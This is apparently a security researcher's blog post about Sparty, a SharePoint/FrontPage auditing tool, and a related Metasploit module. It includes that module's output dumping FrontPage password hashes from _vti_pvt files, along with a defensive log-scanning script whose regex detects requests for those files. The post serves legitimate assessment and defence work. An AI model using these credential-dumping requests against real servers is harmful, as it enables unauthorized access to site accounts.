Sparty : Useful Tools Die Hard !

Sparty was designed to conduct efficient security assessments of MS SharePoint deployments. The security community has used the tool, which shows its acceptance and highlights that it is useful.

Sparty was presented at BlackHat 2013 and the presentation is available at: https://media.blackhat.com/us-13/Arsenal/us-13-Sood-Sparty-Slides.pdf

Overview

Sparty is an open source tool written in Python to audit web applications using SharePoint and FrontPage architecture. The motivation behind this tool is to provide an easy and robust way to scrutinize the security configurations of SharePoint- and FrontPage-based web applications. Because this web administration software is complex, a simple and efficient tool is needed that gathers information, checks access permissions, dumps critical information from default files and performs automated exploitation if security risks are identified. A number of automated scanners fall short of this, and Sparty is a solution to that.

The tool is hosted here: https://github.com/adityaks/sparty

Sparty has been enhanced by other researchers as well. Links are presented below.

https://github.com/0xdevalias/ then added support for “NTLM Authentication”, which was a good enhancement for testing authenticated MS SharePoint deployments.

More details here: https://blog.devalias.net/post/66844345127/sparty-sharepoint-frontpage-auditing-tool-now-with-more

Further, the Sparty source code has also been used to draft an “Auxiliary Scanner” module for the Metasploit Framework for the vulnerability reported many years ago. Details are presented below:

Vulnerability: https://insecure.org/sploits/Microsoft.frontpage.insecurities.html

Metasploit Framework Module — https://github.com/rapid7/metasploit-framework/pull/10534/files

https://www.rapid7.com/db/modules/auxiliary/scanner/http/frontpage_credential_dump

The msf module works (referenced from: https://github.com/rapid7/metasploit-framework/pull/10534/files ) as shown below:

msf auxiliary(scanner/http/frontpage_credential_dump) > run

[*] Requesting: /about/_vti_pvt/service.pwd
[*] Found /about/_vti_pvt/service.pwd.
[*] Found FrontPage credentials.
[+] 10.10.10.10 - service.pwd
[*] Requesting: /about/_vti_pvt/administrators.pwd
[*] Found /about/_vti_pvt/administrators.pwd.
[*] Found FrontPage credentials.
[+] 10.10.10.10 - administrators.pwd
[*] Requesting: /about/_vti_pvt/authors.pwd
[*] Found /about/_vti_pvt/authors.pwd.
[*] Found FrontPage credentials.
[+] 10.10.10.10 - authors.pwd

FrontPage Credentials
=====================
Source          Username    Password Hash
------          --------    -------------
Administrators  e-scan.com  xMyvw4d3c1oWY
Authors         e-scan.com  xMyvw4d3c1oWY
Service         e-scan.com  jLAsITPJ8AsaR

[*] Credentials saved in: /root/.msf4/loot/20180921124828_default_10.10.10.10_frontpage.creds_090555.txt
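
On the defensive side, the requests in the scanner output above leave a distinct trace in web server logs. The following is an added example (not part of Sparty or the Metasploit module) that scans access-log lines for requests to the three FrontPage password files and separates files that were actually served from failed probes. The combined log format, the function name `scan` and the sample log lines are assumptions constructed for illustration.

```python
import re
from collections import defaultdict
from urllib.parse import unquote

# Constructed sample access-log lines (combined log format); not real traffic.
SAMPLE_LOG = """\
192.0.2.15 - - [21/Sep/2018:12:48:27 +0000] "GET /about/_vti_pvt/service.pwd HTTP/1.1" 200 43 "-" "-"
192.0.2.15 - - [21/Sep/2018:12:48:27 +0000] "GET /about/_vti_pvt/administrators.pwd HTTP/1.1" 200 49 "-" "-"
192.0.2.15 - - [21/Sep/2018:12:48:28 +0000] "GET /about/_VTI_PVT/Authors.pwd HTTP/1.1" 404 0 "-" "-"
198.51.100.7 - - [21/Sep/2018:12:50:02 +0000] "GET /docs/%5Fvti%5Fpvt/service.pwd?x=1 HTTP/1.1" 403 0 "-" "-"
203.0.113.9 - - [21/Sep/2018:12:51:10 +0000] "GET /about/index.html HTTP/1.1" 200 5120 "-" "-"
"""

# client ip, method, request target, status code, response size
LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+)[^"]*" (\d{3}) (\d+|-)')
# The three FrontPage password files named in the scanner output above.
PWD_RE = re.compile(r'/_vti_pvt/(service|administrators|authors)\.pwd$')


def scan(log_text):
    """Return {client_ip: {"exposed": [...], "probed": [...]}} for .pwd requests."""
    hits = defaultdict(lambda: {"exposed": [], "probed": []})
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # skip lines that are not in the assumed log format
        ip, _method, target, status, size = m.groups()
        # Drop the query string, decode %xx escapes, and lowercase the path
        # so encoded or mixed-case variants of the same file are still caught.
        path = unquote(target.split("?", 1)[0]).lower()
        if not PWD_RE.search(path):
            continue
        # A 200 with a non-empty body means the password file was served.
        served = status == "200" and size not in ("-", "0")
        hits[ip]["exposed" if served else "probed"].append(path)
    return dict(hits)


if __name__ == "__main__":
    for ip, result in scan(SAMPLE_LOG).items():
        print(ip, "EXPOSED" if result["exposed"] else "probe only", result)
```

Any entry under "exposed" means a password file was readable over HTTP, so the `_vti_pvt` directory permissions need fixing and the listed accounts should have their passwords changed.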

Rapid7 has added the auxiliary scanner “frontpage_credential_dump” to its module database, as the entry below shows:

Rapid7: Auxiliary Scanner

Note: Thanks to all the researchers who further contributed to enhance the tool. Appreciate the fact that work has been credited as well.

Learn, Share and Enjoy !

Aditya K Sood
